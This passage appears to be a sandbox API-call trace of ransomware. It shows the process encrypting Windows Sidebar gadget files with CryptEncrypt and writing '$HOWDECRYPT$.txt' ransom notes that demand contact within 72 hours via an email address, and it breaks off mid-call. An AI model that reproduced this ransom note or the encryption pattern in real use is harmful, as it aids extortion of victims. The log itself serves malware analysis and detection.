(lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.794] GetProcessHeap () returned 0x2c0000 [0160.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.795] GetProcessHeap () returned 0x2c0000 [0160.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed818 | out: hHeap=0x2c0000) returned 1 [0160.795] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e970 | out: pbBuffer=0x248e970) returned 1 [0160.795] GetProcessHeap () returned 0x2c0000 [0160.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e968*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e968*=0x30) returned 1 [0160.795] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.799] GetProcessHeap () returned 0x2c0000 [0160.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.799] GetProcessHeap () returned 0x2c0000 [0160.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed478 | out: hHeap=0x2c0000) returned 1 [0160.799] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e970 | out: pbBuffer=0x248e970) returned 1 [0160.799] GetProcessHeap () returned 0x2c0000 [0160.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.799] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e968*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e968*=0x30) returned 1 [0160.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.807] GetProcessHeap () returned 0x2c0000 [0160.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.807] GetProcessHeap () returned 0x2c0000 [0160.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed0d8 | out: hHeap=0x2c0000) returned 1 [0160.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e968 | out: pbBuffer=0x248e968) returned 1 [0160.807] GetProcessHeap () returned 0x2c0000 [0160.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e960*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e960*=0x30) returned 1 [0160.807] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)alerticon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.813] GetProcessHeap () returned 0x2c0000 [0160.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.813] GetProcessHeap () returned 0x2c0000 [0160.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e308 | out: hHeap=0x2c0000) returned 1 [0160.813] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e968 | out: pbBuffer=0x248e968) returned 1 [0160.813] GetProcessHeap () returned 0x2c0000 [0160.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.813] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e960*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e960*=0x30) returned 1 [0160.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)greenstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.818] GetProcessHeap () returned 0x2c0000 [0160.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.818] GetProcessHeap () returned 0x2c0000 [0160.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c838e8 | out: hHeap=0x2c0000) returned 1 [0160.818] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e960 | out: pbBuffer=0x248e960) returned 1 [0160.818] GetProcessHeap () returned 0x2c0000 [0160.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.818] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e958*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e958*=0x30) returned 1 [0160.819] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)alerticon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.819] GetProcessHeap () returned 0x2c0000 [0160.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.819] GetProcessHeap () returned 0x2c0000 [0160.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e0d8 | out: hHeap=0x2c0000) returned 1 [0160.819] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e960 | out: pbBuffer=0x248e960) returned 1 [0160.819] GetProcessHeap () returned 0x2c0000 [0160.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.819] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e958*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e958*=0x30) returned 1 [0160.819] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.824] GetProcessHeap () returned 0x2c0000 [0160.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.824] GetProcessHeap () returned 0x2c0000 [0160.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eecb68 | out: hHeap=0x2c0000) returned 1 [0160.824] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e958 | out: pbBuffer=0x248e958) returned 1 [0160.824] GetProcessHeap () returned 0x2c0000 [0160.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.824] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e950*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e950*=0x30) returned 1 [0160.824] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.838] GetProcessHeap () returned 0x2c0000 [0160.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.838] GetProcessHeap () returned 0x2c0000 [0160.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38a68 | out: hHeap=0x2c0000) returned 1 [0160.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e958 | out: pbBuffer=0x248e958) returned 1 [0160.839] GetProcessHeap () returned 0x2c0000 [0160.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e950*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e950*=0x30) returned 1 [0160.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\localizedStrings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\localizedstrings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.849] GetProcessHeap () returned 0x2c0000 [0160.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.849] GetProcessHeap () returned 0x2c0000 [0160.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41250 | out: hHeap=0x2c0000) returned 1 [0160.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.883] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.883] WriteFile (in: hFile=0x178, lpBuffer=0x248e887*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e9b0, lpOverlapped=0x0 | out: lpBuffer=0x248e887*, lpNumberOfBytesWritten=0x248e9b0*=0x127, lpOverlapped=0x0) returned 1 [0160.884] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.884] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e9b0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e9b0*=0x2ac, lpOverlapped=0x0) returned 1 [0160.884] CloseHandle (hObject=0x178) returned 1 [0160.884] GetProcessHeap () returned 0x2c0000 [0160.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43828 | out: hHeap=0x2c0000) returned 1 [0160.884] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e950 | out: pbBuffer=0x248e950) returned 1 [0160.884] GetProcessHeap () returned 0x2c0000 [0160.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.884] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e948*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e948*=0x30) returned 1 [0160.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.900] GetProcessHeap () returned 0x2c0000 [0160.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.900] GetProcessHeap () returned 0x2c0000 [0160.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43128 | out: hHeap=0x2c0000) returned 1 [0160.900] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e948 | out: pbBuffer=0x248e948) returned 1 [0160.900] GetProcessHeap () returned 0x2c0000 [0160.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.900] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e940*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e940*=0x30) returned 1 [0160.900] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.900] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e948 | out: pbBuffer=0x248e948) returned 1 [0160.901] GetProcessHeap () returned 0x2c0000 [0160.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e940*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e940*=0x30) returned 1 [0160.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.903] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.904] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.904] WriteFile (in: hFile=0x178, lpBuffer=0x248e877*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e9a0, lpOverlapped=0x0 | out: lpBuffer=0x248e877*, lpNumberOfBytesWritten=0x248e9a0*=0x127, lpOverlapped=0x0) returned 1 [0160.905] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.905] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e9a0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e9a0*=0x2ac, lpOverlapped=0x0) returned 1 [0160.905] CloseHandle (hObject=0x178) returned 1 [0160.905] GetProcessHeap () returned 0x2c0000 [0160.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3dd90 | out: hHeap=0x2c0000) returned 1 [0160.905] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e940 | out: pbBuffer=0x248e940) returned 1 [0160.905] GetProcessHeap () returned 0x2c0000 [0160.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.905] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e938*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e938*=0x30) returned 1 [0160.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\slideshow_glass_frame.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.918] GetProcessHeap () returned 0x2c0000 [0160.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.919] GetProcessHeap () returned 0x2c0000 [0160.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83570 | out: hHeap=0x2c0000) returned 1 [0160.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e938 | out: pbBuffer=0x248e938) returned 1 [0160.919] GetProcessHeap () returned 0x2c0000 [0160.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e930*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e930*=0x30) returned 1 [0160.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.940] GetProcessHeap () returned 0x2c0000 [0160.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.941] GetProcessHeap () returned 0x2c0000 [0160.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb17b8 | out: hHeap=0x2c0000) returned 1 [0160.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e938 | out: pbBuffer=0x248e938) returned 1 [0160.941] GetProcessHeap () returned 0x2c0000 [0160.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.941] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e930*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e930*=0x30) returned 1 [0160.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.949] GetProcessHeap () returned 0x2c0000 [0160.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.949] GetProcessHeap () returned 0x2c0000 [0160.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec5f8 | out: hHeap=0x2c0000) returned 1 [0160.949] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e930 | out: pbBuffer=0x248e930) returned 1 [0160.949] GetProcessHeap () returned 0x2c0000 [0160.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.949] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e928*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e928*=0x30) returned 1 [0160.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_flyout.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.982] GetProcessHeap () returned 0x2c0000 [0160.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.982] GetProcessHeap () returned 0x2c0000 [0160.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3db60 | out: hHeap=0x2c0000) returned 1 [0160.982] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e930 | out: pbBuffer=0x248e930) returned 1 [0160.982] GetProcessHeap () returned 0x2c0000 [0160.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.983] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e928*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e928*=0x30) returned 1 [0160.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssLogo.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rsslogo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.984] GetProcessHeap () returned 0x2c0000 [0160.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.984] GetProcessHeap () returned 0x2c0000 [0160.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c180 | out: hHeap=0x2c0000) returned 1 [0160.984] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e928 | out: pbBuffer=0x248e928) returned 1 [0160.984] GetProcessHeap () returned 0x2c0000 [0160.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.984] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e920*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e920*=0x30) returned 1 [0160.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_undocked.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.984] GetProcessHeap () returned 0x2c0000 [0160.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.984] GetProcessHeap () returned 0x2c0000 [0160.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d930 | out: hHeap=0x2c0000) returned 1 [0160.985] CryptGenRandom (in: 